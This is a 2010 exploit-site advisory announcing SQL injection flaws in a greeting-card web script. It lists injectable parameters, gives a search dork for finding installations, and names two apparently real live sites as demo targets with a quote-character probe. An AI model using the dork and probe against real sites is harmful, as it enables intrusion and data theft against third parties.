Grering card SQL Injection Vulnerability

2010-06-22 20:49:28
Posted by: Net.Edit0r


# Title : Grering card SQL Injection Vulnerability
# Author : Net.Edit0r
# Location : Iran
# Dork : "Send amazing greetings to your friends and relative!"
# Category : webapps

[~]######################################### InformatioN #############################################[~]

[~] Title : Grering card SQL Injection Vulnerability
[~] Author : Net.Edit0r
[~] Email : [email protected] ~ [email protected]

[~]######################################### ExploiT #############################################[~]

[~] 1. Vulnerable File :

http://127.0.0.1/search.php?CategoryID=15&SubcategoryID=[SQL]

[~] 2. Vulnerable File :

http://127.0.0.1/search.php?CategoryID=6[SQL]

[~] 3. Vulnerable File :

http://127.0.0.1/news.php?CategoryID=[SQL]

[~] 3. Demo :

http://ecardworld.net/search.php?CategoryID=15&SubcategoryID=60'

http://www.cutegreetingscard.com/search.php?CategoryID=6'


[~]######################################### ThankS To ... ############################################[~]

[~] Special Thanks To My Best FriendS :

NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ , ~~XTerror~~ , __l2o5v4__ , _Attack_

[~] IRANIAN Young HackerZ

[~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR

[~]######################################### FinisH :D #############################################[~]

Fixes

No fixes

In order to submit a new fix you need to be registered.